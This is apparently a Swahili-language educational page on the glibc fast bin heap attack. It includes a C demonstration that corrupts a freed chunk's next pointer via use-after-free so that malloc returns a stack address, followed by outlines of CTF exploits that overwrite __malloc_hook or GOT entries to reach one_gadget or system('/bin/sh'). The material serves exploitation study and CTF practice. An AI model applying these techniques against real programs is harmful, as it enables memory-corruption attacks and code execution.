Fast Bin Attack

Reading time: 9 minutes

Basic Information

Kwa maelezo zaidi kuhusu nini maana ya fast bin angalia ukurasa huu:

{{#ref}} bins-and-memory-allocations.md {{#endref}}

Kwa sababu fast bin ni orodha iliyo na viungo moja, kuna ulinzi mdogo zaidi kuliko katika bins nyingine na tu kubadilisha anwani katika kipande kilichofutwa cha fast bin inatosha kuwa na uwezo wa kuweka baadaye kipande katika anwani yoyote ya kumbukumbu.

Kama muhtasari:

ptr0 = malloc(0x20);
ptr1 = malloc(0x20);

// Put them in fast bin (suppose tcache is full)
free(ptr0)
free(ptr1)

// Use-after-free
// Modify the address where the free chunk of ptr1 is pointing
*ptr1 = (unsigned long)((char *)&<address>);

ptr2 = malloc(0x20); // This will get ptr1
ptr3 = malloc(0x20); // This will get a chunk in the <address> which could be abuse to overwrite arbitrary content inside of it

Unaweza kupata mfano kamili katika msimbo ulioelezewa vizuri kutoka https://guyinatuxedo.github.io/28-fastbin_attack/explanation_fastbinAttack/index.html:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(void)
{
puts("Today we will be discussing a fastbin attack.");
puts("There are 10 fastbins, which act as linked lists (they're separated by size).");
puts("When a chunk is freed within a certain size range, it is added to one of the fastbin linked lists.");
puts("Then when a chunk is allocated of a similar size, it grabs chunks from the corresponding fastbin (if there are chunks in it).");
puts("(think sizes 0x10-0x60 for fastbins, but that can change depending on some settings)");
puts("\nThis attack will essentially attack the fastbin by using a bug to edit the linked list to point to a fake chunk we want to allocate.");
puts("Pointers in this linked list are allocated when we allocate a chunk of the size that corresponds to the fastbin.");
puts("So we will just allocate chunks from the fastbin after we edit a pointer to point to our fake chunk, to get malloc to return a pointer to our fake chunk.\n");
puts("So the tl;dr objective of a fastbin attack is to allocate a chunk to a memory region of our choosing.\n");

puts("Let's start, we will allocate three chunks of size 0x30\n");
unsigned long *ptr0, *ptr1, *ptr2;

ptr0 = malloc(0x30);
ptr1 = malloc(0x30);
ptr2 = malloc(0x30);

printf("Chunk 0: %p\n", ptr0);
printf("Chunk 1: %p\n", ptr1);
printf("Chunk 2: %p\n\n", ptr2);


printf("Next we will make an integer variable on the stack. Our goal will be to allocate a chunk to this variable (because why not).\n");

int stackVar = 0x55;

printf("Integer: %x\t @: %p\n\n", stackVar, &stackVar);

printf("Proceeding that I'm going to write just some data to the three heap chunks\n");

char *data0 = "00000000";
char *data1 = "11111111";
char *data2 = "22222222";

memcpy(ptr0, data0, 0x8);
memcpy(ptr1, data1, 0x8);
memcpy(ptr2, data2, 0x8);

printf("We can see the data that is held in these chunks. This data will get overwritten when they get added to the fastbin.\n");

printf("Chunk 0: %s\n", (char *)ptr0);
printf("Chunk 1: %s\n", (char *)ptr1);
printf("Chunk 2: %s\n\n", (char *)ptr2);

printf("Next we are going to free all three pointers. This will add all of them to the fastbin linked list. We can see that they hold pointers to chunks that will be allocated.\n");

free(ptr0);
free(ptr1);
free(ptr2);

printf("Chunk0 @ 0x%p\t contains: %lx\n", ptr0, *ptr0);
printf("Chunk1 @ 0x%p\t contains: %lx\n", ptr1, *ptr1);
printf("Chunk2 @ 0x%p\t contains: %lx\n\n", ptr2, *ptr2);

printf("So we can see that the top two entries in the fastbin (the last two chunks we freed) contains pointers to the next chunk in the fastbin. The last chunk in there contains `0x0` as the next pointer to indicate the end of the linked list.\n\n");


printf("Now we will edit a freed chunk (specifically the second chunk \"Chunk 1\"). We will be doing it with a use after free, since after we freed it we didn't get rid of the pointer.\n");
printf("We will edit it so the next pointer points to the address of the stack integer variable we talked about earlier. This way when we allocate this chunk, it will put our fake chunk (which points to the stack integer) on top of the free list.\n\n");

*ptr1 = (unsigned long)((char *)&stackVar);

printf("We can see it's new value of Chunk1 @ %p\t hold: 0x%lx\n\n", ptr1, *ptr1);


printf("Now we will allocate three new chunks. The first one will pretty much be a normal chunk. The second one is the chunk which the next pointer we overwrote with the pointer to the stack variable.\n");
printf("When we allocate that chunk, our fake chunk will be at the top of the fastbin. Then we can just allocate one more chunk from that fastbin to get malloc to return a pointer to the stack variable.\n\n");

unsigned long *ptr3, *ptr4, *ptr5;

ptr3 = malloc(0x30);
ptr4 = malloc(0x30);
ptr5 = malloc(0x30);

printf("Chunk 3: %p\n", ptr3);
printf("Chunk 4: %p\n", ptr4);
printf("Chunk 5: %p\t Contains: 0x%x\n", ptr5, (int)*ptr5);

printf("\n\nJust like that, we executed a fastbin attack to allocate an address to a stack variable using malloc!\n");
}

Mifano

• CTF https://guyinatuxedo.github.io/28-fastbin_attack/0ctf_babyheap/index.html:
• Inawezekana kugawa vipande, kuvisafisha, kusoma maudhui yake na kuviweka (kwa udhaifu wa overflow).
• Consolidate chunk for infoleak: Mbinu hii ni kimsingi kutumia overflow kuunda prev_size bandia ili vipande vya awali viwe ndani ya kimoja kikubwa, hivyo wakati wa kugawa kimoja kikubwa kinachoshikilia kipande kingine, inawezekana kuchapisha data yake na kuvuja anwani kwa libc (main_arena+88).
• Overwrite malloc hook: Kwa hili, na kutumia hali ya awali ya overlapping, ilikuwa inawezekana kuwa na vipande 2 vilivyokuwa vinashikilia kumbukumbu ile ile. Hivyo, kuvisafisha vyote (kusafisha kipande kingine katikati ili kuepuka ulinzi) ilikuwa inawezekana kuwa na kipande kile kile katika fast bin mara 2. Kisha, ilikuwa inawezekana kukigawa tena, kubadilisha anwani ya kipande kinachofuata ili kiashirie kidogo kabla ya __malloc_hook (hivyo kiashirie kwa nambari ambayo malloc inadhani ni ukubwa wa bure - njia nyingine ya kupita), kukigawa tena na kisha kugawa kipande kingine ambacho kitapokea anwani kwa malloc hooks.
  Hatimaye one gadget iliandikwa humo.
• CTF https://guyinatuxedo.github.io/28-fastbin_attack/csaw17_auir/index.html:
• Kuna overflow ya heap na matumizi baada ya kusafisha na kusafisha mara mbili kwa sababu wakati kipande kinapaswa kusafishwa inawezekana kutumia tena na kusafisha tena viashiria
• Libc info leak: Safisha tu baadhi ya vipande na vitapata kiashiria kwa sehemu ya eneo kuu la arena. Kwa kuwa unaweza kutumia tena viashiria vilivyofutwa, soma tu anwani hii.
• Fast bin attack: Viashiria vyote vya kugawa vinahifadhiwa ndani ya array, hivyo tunaweza kusafisha vipande kadhaa vya fast bin na katika la mwisho kubadilisha anwani ili kiashirie kidogo kabla ya array hii ya viashiria. Kisha, gawiwa vipande kadhaa vya ukubwa sawa na tutapata kwanza ile halali na kisha ile bandia inayoshikilia array ya viashiria. Sasa tunaweza kubadilisha viashiria vya kugawa ili kufanya anwani ya GOT ya free iashirie kwa system na kisha kuandika "/bin/sh" katika kipande 1 ili kisha kuita free(chunk1) ambayo badala yake itatekeleza system("/bin/sh").
• CTF https://guyinatuxedo.github.io/33-custom_misc_heap/csaw19_traveller/index.html
• Mfano mwingine wa kutumia overflow ya byte moja kuunganisha vipande katika unsorted bin na kupata libc infoleak na kisha kufanya mashambulizi ya fast bin kubadilisha malloc hook na anwani ya one gadget
• CTF https://guyinatuxedo.github.io/33-custom_misc_heap/csaw18_alienVSsamurai/index.html
• Baada ya infoleak ikitumia unsorted bin na UAF kuvuja anwani ya libc na anwani ya PIE, exploit ya CTF hii ilitumia mashambulizi ya fast bin kugawa kipande katika mahali ambapo viashiria vya vipande vilivyodhibitiwa vilikuwa vimewekwa hivyo ilikuwa inawezekana kubadilisha viashiria fulani ili kuandika one gadget katika GOT
• Unaweza kupata mashambulizi ya Fast Bin yaliyotumiwa kupitia mashambulizi ya unsorted bin:
• Kumbuka kwamba ni kawaida kabla ya kufanya mashambulizi ya fast bin kutumia orodha za bure kuvuja anwani za libc/heap (wakati inahitajika).
• Robot Factory. BlackHat MEA CTF 2022
• Tunaweza tu kugawa vipande vya ukubwa mkubwa zaidi ya 0x100.
• Badilisha global_max_fast kwa kutumia mashambulizi ya Unsorted Bin (inafanya kazi 1/16 kwa sababu ya ASLR, kwa sababu tunahitaji kubadilisha bits 12, lakini lazima tubadilishe bits 16).
• Mashambulizi ya Fast Bin kubadilisha array ya kimataifa ya vipande. Hii inatoa primitive ya kusoma/kandika isiyo na mipaka, ambayo inaruhusu kubadilisha GOT na kuweka baadhi ya kazi kuashiria kwa system.

{{#ref}} unsorted-bin-attack.md {{#endref}}